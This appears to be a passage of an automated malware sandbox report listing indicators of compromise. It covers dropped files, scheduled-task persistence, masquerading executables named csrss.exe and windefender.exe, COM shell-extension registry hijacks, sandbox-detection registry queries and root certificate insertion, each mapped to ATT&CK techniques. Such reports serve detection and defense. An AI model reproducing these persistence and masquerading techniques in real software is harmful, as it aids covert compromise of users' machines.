File created	C:\Program Files (x86)\ClocX\Presets\iToolsClock2.png	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Sounds\ring.wav	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Lang\Svenska.lng	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\Cappuccino.ini	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\MilkClock.bmp	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\Negro.ini	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\default.ini	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\wonderglobe2.ini	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\BallClockAmber.bmp	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\Naranja.png	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Sounds\trumpet.mp3	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\BallClockAqua.bmp	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlueBallRoman.png	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\MClkhrHand.hpng	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Lang\Russian.lng	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\Casio.png	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\MickeyMouse.ini	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\mars.png	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\Original.png	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\hallow.ini	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Lang\Bulgarian.lng	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlackAppleClock.bmp	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlueBallRoman.ini	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\DarkCrystalBall.png	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\LongClock.bmp	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\dsaqua.bmp	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\UniversalAccessClock.bmp	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\Wall Clock medium.ini	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\AquaB.png	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlueBallOnlyDots.ini	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\Comdex - Omega1.ini	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\DarkCrystalBall.ini	S5KV4yldRzQLMnJBD7trg9f5.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\rss	nmNNzXaLg4wXxwjYAX3aGb98.exe
File created	C:\Windows\rss\csrss.exe	nmNNzXaLg4wXxwjYAX3aGb98.exe
File created	C:\Windows\Tasks\bgKZxxDIOpRGITjYTe.job	schtasks.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20240116164246.cab	makecab.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\rss	va5doQL3q4S6YWWF7jom7c9M.exe
File created	C:\Windows\rss\csrss.exe	va5doQL3q4S6YWWF7jom7c9M.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
524	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

NSIS installer 6 IoCs

installer

resource	yara_rule
behavioral1/files/0x000200000000f87a-468.dat	nsis_installer_1
behavioral1/files/0x000200000000f87a-468.dat	nsis_installer_2
behavioral1/files/0x000200000000f87a-469.dat	nsis_installer_1
behavioral1/files/0x000200000000f87a-469.dat	nsis_installer_2
behavioral1/files/0x000200000000f87a-467.dat	nsis_installer_1
behavioral1/files/0x000200000000f87a-467.dat	nsis_installer_2

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	nsyD606.tmp
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	nsyD606.tmp

Creates scheduled task(s) 1 TTPs 8 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2372	schtasks.exe
2260	schtasks.exe
1440	schtasks.exe
1644	schtasks.exe
2332	schtasks.exe
1788	schtasks.exe
2956	schtasks.exe
1184	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2328	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies."	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	nmNNzXaLg4wXxwjYAX3aGb98.exe

Modifies registry class 22 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID	S5KV4yldRzQLMnJBD7trg9f5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD1CAC3-5661-FFFE-2CE7-8D413F916553}	S5KV4yldRzQLMnJBD7trg9f5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD1CAC3-5661-FFFE-2CE7-8D413F916553}\InProcServer32\ = "C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\NppConverter.dll"	S5KV4yldRzQLMnJBD7trg9f5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2ED1CAC3-5661-FFFE-2CE7-8D413F916553}\InProcServer32\ = "C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\NppConverter.dll"	S5KV4yldRzQLMnJBD7trg9f5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\CopyHookHandlers\FileSystemEx	S5KV4yldRzQLMnJBD7trg9f5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2ED1CAC3-5661-FFFE-2CE7-8D413F916553}	S5KV4yldRzQLMnJBD7trg9f5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1AD1CAC3-5661-FFFE-2CE7-8D413F916553}\InProcServer32	S5KV4yldRzQLMnJBD7trg9f5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1AD1CAC3-5661-FFFE-2CE7-8D413F916553}\InProcServer32\ThreadingModel = "Apartment"	S5KV4yldRzQLMnJBD7trg9f5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\ShellEx\{e357fccd-a995-4576-b01f-234630154e96}	S5KV4yldRzQLMnJBD7trg9f5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD1CAC3-5661-FFFE-2CE7-8D413F916553}\InProcServer32\ThreadingModel = "Apartment"	S5KV4yldRzQLMnJBD7trg9f5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\CopyHookHandlers\FileSystemEx\ = "{2ED1CAC3-5661-FFFE-2CE7-8D413F916553}"	S5KV4yldRzQLMnJBD7trg9f5.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\CLSID\{1FD1CAC3-5661-FFFE-2CE7-8D413F916553}\InProcServer32	S5KV4yldRzQLMnJBD7trg9f5.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\CLSID\{1FD1CAC3-5661-FFFE-2CE7-8D413F916553}	S5KV4yldRzQLMnJBD7trg9f5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2ED1CAC3-5661-FFFE-2CE7-8D413F916553}\InProcServer32	S5KV4yldRzQLMnJBD7trg9f5.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\CLSID\{2ED1CAC3-5661-FFFE-2CE7-8D413F916553}\InProcServer32	S5KV4yldRzQLMnJBD7trg9f5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1AD1CAC3-5661-FFFE-2CE7-8D413F916553}	S5KV4yldRzQLMnJBD7trg9f5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1AD1CAC3-5661-FFFE-2CE7-8D413F916553}\InProcServer32\ = "C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\NppConverter.dll"	S5KV4yldRzQLMnJBD7trg9f5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD1CAC3-5661-FFFE-2CE7-8D413F916553}\InProcServer32	S5KV4yldRzQLMnJBD7trg9f5.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\CLSID	S5KV4yldRzQLMnJBD7trg9f5.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\CLSID\{2ED1CAC3-5661-FFFE-2CE7-8D413F916553}	S5KV4yldRzQLMnJBD7trg9f5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\{e357fccd-a995-4576-b01f-234630154e96}\ = "{1AD1CAC3-5661-FFFE-2CE7-8D413F916553}"	S5KV4yldRzQLMnJBD7trg9f5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2ED1CAC3-5661-FFFE-2CE7-8D413F916553}\InProcServer32\ThreadingModel = "Apartment"	S5KV4yldRzQLMnJBD7trg9f5.exe

Modifies system certificate store 2 TTPs 11 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	bd1WomvtfddaPIsukh6Mi1KR.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946